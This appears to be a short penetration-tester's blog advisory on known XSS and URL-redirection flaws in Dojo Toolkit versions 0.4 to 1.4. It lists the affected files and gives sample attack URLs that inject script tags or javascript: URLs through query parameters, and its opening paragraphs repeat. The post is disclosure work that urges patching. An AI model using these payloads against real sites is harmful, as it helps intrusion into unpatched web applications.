By Deepak Choudhary.
3rd party libraries can become critical components of in-house developed applications, while the benefits to using them is huge, there is also some risks to consider. In this blog post we'll look at a common 3rd party component of many web applications, Dojo Toolkit. After noticing it was included during a recent web application penetration test, it became clear that the version incorporated within the application was vulnerable, and ultimately exposed the entire application to attack.
Vulnerable version: Dojo 0.4 through Dojo 1.4
Latest Version: Dojo 1.9.3
Reference: http://dojotoolkit.org/ , http://dojotoolkit.org/features/mobile
If you use Dojo, make sure you have an updated version installed or remove these files (if not needed) from the application's directories.
3rd party libraries can become critical components of in-house developed applications, while the benefits to using them is huge, there is also some risks to consider. In this blog post we'll look at a common 3rd party component of many web applications, Dojo Toolkit. After noticing it was included during a recent web application penetration test, it became clear that the version incorporated within the application was vulnerable, and ultimately exposed the entire application to attack.
Dojo Toolkit
If you haven't encountered Dojo before, just know it is a JavaScript (Javascript/AJAX) library used to design cross-platform web and mobile applications. The framework itself provides various "widgets" that can be used to support a variety of browsers, everything from Safari to Chrome on iPhone to Blackberry.Documented Vulnerabilities
Dojo has reported some serious security issues in the past such as XSS, DOM-Based XSS, and URL Redirection so its important to stay up to date with the latest version if you leverage it within your application.Vulnerable version: Dojo 0.4 through Dojo 1.4
Latest Version: Dojo 1.9.3
Reference: http://dojotoolkit.org/ , http://dojotoolkit.org/features/mobile
Files with known vulnerabilities
- dojo/resources/iframe_history.html
- dojox/av/FLAudio.js
- dojox/av/FLVideo.js
- dojox/av/resources/audio.swf
- dojox/av/resources/video.swf
- util/buildscripts/jslib/build.js
- util/buildscripts/jslib/buildUtil.js
- util/doh/runner.html
- /dijit/tests/form/test_Button.html
Prior attack strings
- http://WebApp/dojo/iframe_history.html?location=http://www.google.com
- http://WebApp/dojo/iframe_history.html?location=javascript:alert%20%289999%2
- http://WebApp/util/doh/runner.html?dojoUrl='/>foo</script><'"<script>alert(/xss/)</script>
- http://WebApp/util/doh/runner.html?testUrL='/>foo</script><'"<script>alert(/xss/)</script>
- http://WebApp/dijit/tests/form/test_Button.html?theme="/><script>alert(/xss/)</script>
- dojox/av/FLAudio.js (allowScriptAccess:"always”)
- dojox/av/FLVideo.js (allowScriptAccess:"always”) and etc.
If you use Dojo, make sure you have an updated version installed or remove these files (if not needed) from the application's directories.